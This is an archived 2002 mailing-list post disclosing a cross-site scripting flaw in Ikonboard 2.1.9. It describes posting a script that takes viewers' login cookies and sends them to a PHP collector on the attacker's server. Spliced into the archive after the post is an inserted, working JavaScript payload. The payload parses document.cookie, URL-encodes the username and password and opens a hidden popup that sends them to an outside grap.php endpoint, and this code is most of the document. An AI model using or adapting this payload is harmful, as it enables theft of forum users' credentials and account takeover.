Re: Ikonboard 2.1.9 (possibly other versions) Vulnerability when HTML is ON

From: Stefan Walk (kyraelat_private)
Date: Wed Apr 24 2002 - 14:26:29 PDT


    Hello! 
    This is a vulnerability of Ikonboard 2.1.9 (possibly other versions, probably all 2.x.x versions) when HTML is ON.
    Anyone can post a script that allows him to save the username and password of everyone who views the post and has JavaScript enabled.
    
    The password is stolen by two scripts:
    1. A PHP script on my server, call it grap.php. If this file is opened like
       this: grap.php?user=STOLENUSERNAME&pass=STOLENPASSWORD, it saves user
       and pass in a file on my server.
    2. A JavaScript that is posted in the body of a post in the Ikonboard.
       It reads the cookie, extracts the username out of the cookie into the
       variable X and the password into the variable Y, and opens a popup with
       the location http://www.myserver.com/grap.php?user=X&pass=Y. The PHP
       script then saves user and pass.
    
    
    Stefan Walk
    
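The client-side half of the attack described above, as an added example that is not Stefan Walk's posted script and not Ikonboard code. The post does not give the names of Ikonboard's cookies, so the cookie names "ikon_user" and "ikon_pass", the grap.php endpoint URL and the sample cookie string are assumptions; the useful point beyond the post is that the stolen values must be URL-encoded, since a password containing "&" or "=" would otherwise truncate or corrupt the query string that grap.php receives.

```javascript
// Added example of the cookie-stealing payload the post describes. Not the
// original script. Cookie names, endpoint URL and sample data are assumed.

// Parse a document.cookie string ("a=1; b=2") into a plain object.
function parseCookies(cookieString) {
  const jar = {};
  for (const part of cookieString.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (name) jar[name] = value;
  }
  return jar;
}

// Build the popup target <endpoint>?user=X&pass=Y from the victim's cookie.
// Returns null when either cookie is absent, so a viewer who is not logged
// in triggers no request at all (the post only concerns logged-in viewers).
// encodeURIComponent keeps "&", "=" and "#" in the password from breaking
// the query string the PHP script parses.
function buildGrabUrl(cookieString, endpoint, userCookie, passCookie) {
  const jar = parseCookies(cookieString);
  const x = jar[userCookie]; // username, "variable X" in the post
  const y = jar[passCookie]; // password, "variable Y" in the post
  if (x === undefined || y === undefined) return null;
  return endpoint + '?user=' + encodeURIComponent(x) +
         '&pass=' + encodeURIComponent(y);
}

// Browser entry point: what the <script> embedded in a forum post would run.
// Outside a browser (no window/document) it does nothing and returns null.
function stealViaPopup() {
  if (typeof document === 'undefined' || typeof window === 'undefined') return null;
  const url = buildGrabUrl(document.cookie,
                           'http://www.myserver.com/grap.php', // assumed endpoint
                           'ikon_user', 'ikon_pass');          // assumed cookie names
  if (url) window.open(url, '_blank', 'width=1,height=1');
  return url;
}

// Constructed sample standing in for document.cookie on a victim's browser.
const SAMPLE_COOKIE = 'ikon_user=alice; ikon_pass=s3cret&more; lastvisit=1019683589';
```

Run in a browser, stealViaPopup() opens the popup against the assumed endpoint; under Node it only exercises buildGrabUrl, which is where the parsing and encoding live.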



    This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 15:29:24 PDT